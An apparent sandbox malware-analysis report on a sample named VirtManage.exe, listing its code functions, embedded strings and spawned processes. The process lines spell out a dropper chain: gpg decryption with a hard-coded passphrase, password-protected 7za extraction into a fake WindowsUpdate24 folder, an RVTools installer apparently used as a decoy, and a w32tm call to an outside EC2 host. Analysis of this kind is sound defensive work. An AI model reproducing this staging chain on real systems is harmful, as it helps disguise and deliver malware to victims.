Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_6561B4581_2_6561B458
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_655FE4CC1_2_655FE4CC
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_655FE4C81_2_655FE4C8
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_656174FB1_2_656174FB
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004BF8C03_2_004BF8C0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_0042D0703_2_0042D070
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_0047A1503_2_0047A150
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004191693_2_00419169
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_0044D1803_2_0044D180
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004A53003_2_004A5300
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004124403_2_00412440
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004E04003_2_004E0400
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004245703_2_00424570
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_0040D5113_2_0040D511
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004745E03_2_004745E0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_0048E5E03_2_0048E5E0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004986003_2_00498600
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004BB6F03_2_004BB6F0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004387E03_2_004387E0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004CC8C03_2_004CC8C0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004779403_2_00477940
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_00433AC03_2_00433AC0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_0040CAD03_2_0040CAD0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004D2AE03_2_004D2AE0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_00434B603_2_00434B60
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004A2BF03_2_004A2BF0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_00406C103_2_00406C10
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_0042DD103_2_0042DD10
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_00447EC03_2_00447EC0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_0040DF283_2_0040DF28
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_666707303_2_66670730
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_666137083_2_66613708
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_6660D0553_2_6660D055
Source: C:\Users\user\Desktop\VirtManage.exeProcess token adjusted: SecurityJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: String function: 004DF490 appears 40 times
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: String function: 00434B30 appears 34 times
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: String function: 00426BB0 appears 44 times
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: String function: 004DEFB0 appears 82 times
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: String function: 665896E6 appears 71 times
Source: zlib1.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: libgcrypt-20.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: libnpth-0.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: libgpg-error-0.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: aclui-2.dll.19.drStatic PE information: Number of sections : 20 > 10
Source: libassuan-9.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: aclui.dll.19.drStatic PE information: Number of sections : 20 > 10
Source: aclui.dll.0.drStatic PE information: Number of sections : 20 > 10
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamezlib1.dll* vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000002.3333068485.000000000040A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamensis7z.dll, vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegpg-agent.exeT vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegpg.exeT vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibassuan.dll" vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibgcrypt.dll" vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibgpg-error.dll" vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibnpth.dll" vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamezlib1.dll* vs VirtManage.exe
Source: VirtManage.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24Jump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24Jump to behavior
Source: classification engineClassification label: mal42.expl.evad.winEXE@54/56@2/3
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004AE4A0 FormatMessageA,strlen,GetLastError,1_2_004AE4A0
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403552
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_00404B74 GetDiskFreeSpaceW,MulDiv,0_2_00404B74
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_00402200 FreeLibrary,CoCreateInstance,0_2_00402200
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeFile created: C:\Users\user\AppData\Roaming\gnupgJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1480:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2648:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5792:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1264:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1896:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3012:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5508:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4380:120:WilError_03
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\Users\user\AppData\Local\Temp\nsg6D2.tmpJump to behavior
Source: VirtManage.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\VirtManage.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: create table if not exists encryptions (binding INTEGER NOT NULL, time INTEGER);create index if not exists encryptions_binding on encryptions (binding);
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: create table version (version INTEGER);
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: insert into version values (1);
Source: gpg.exe, gpg.exe, 00000003.00000002.917669988.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.923429253.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.979415910.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000011.00000002.1006958362.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: select count(*) from sqlite_master where type='table';
Source: gpg.exe, gpg.exe, 00000003.00000002.917669988.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.923429253.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.979415910.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000011.00000002.1006958362.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: select ((select count(*) from ultimately_trusted_keys where (keyid in (%s))) == %d) and ((select count(*) from ultimately_trusted_keys where keyid not in (%s)) == 0);
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: select user_id, policy from bindings where fingerprint = ?;
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: select fingerprint || case sum(conflict NOTNULL) when 0 then '' else '!' end from bindings where email = ? group by fingerprint order by fingerprint = ? asc, fingerprint desc;
Source: gpg.exe, gpg.exe, 00000003.00000002.917669988.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.923429253.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.979415910.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000011.00000002.1006958362.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: gpg.exe, gpg.exe, 00000003.00000002.917669988.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.923429253.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.979415910.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000011.00000002.1006958362.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: insert into ultimately_trusted_keys values ('%s');
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.912308379.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000003.00000002.917669988.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.923429253.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.979415910.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000011.00000002.1006958362.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.drBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: create table if not exists ultimately_trusted_keys (keyid);
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: create table version (version INTEGER);error initializing TOFU database: %s
Source: gpg.exe, gpg.exe, 00000003.00000002.917669988.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.923429253.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.979415910.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000011.00000002.1006958362.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: select version from version;
Source: gpg.exe, gpg.exe, 00000003.00000002.917669988.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.923429253.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.979415910.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000011.00000002.1006958362.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: create table signatures (binding INTEGER NOT NULL, sig_digest TEXT, origin TEXT, sig_time INTEGER, time INTEGER, primary key (binding, sig_digest, origin));
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: update bindings set effective_policy = %d, conflict = %Q where email = %Q and fingerprint = %Q and effective_policy != %d;
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: select count(*) from sqlite_master where type='table';error reading TOFU database: %s
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: update bindings set effective_policy = ? where fingerprint = ?;
Source: gpg.exeString found in binary or memory: full-help
Source: gpg.exeString found in binary or memory: i386/mpih-add1.S:i386/mpih-sub1.S:i386/mpih-mul1.S:i386/mpih-mul2.S:i386/mpih-mul3.S:i386/mpih-lshift.S:i386/mpih-rshift.S
Source: gpg.exeString found in binary or memory: full-help
Source: C:\Users\user\Desktop\VirtManage.exeFile read: C:\Users\user\Desktop\VirtManage.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\VirtManage.exe "C:\Users\user\Desktop\VirtManage.exe"
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\5FILE.1A.gpg
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\7za.dll --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\1FILE.1A.gpg
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\2FILE.1A.gpg
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24
Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i "C:\ProgramData\Microsoft\WindowsUpdate24\RVTools.msi"
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\Cert.txt --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\3FILE.1A.gpg
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding FB5755C4D12C2C80E27834E9FC6EF971 C
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\w32tm.exe w32tm /monitor /computers:ec2-52-14-160-176.us-east-2.compute.amazonaws.com
Source: C:\Windows\SysWOW64\w32tm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
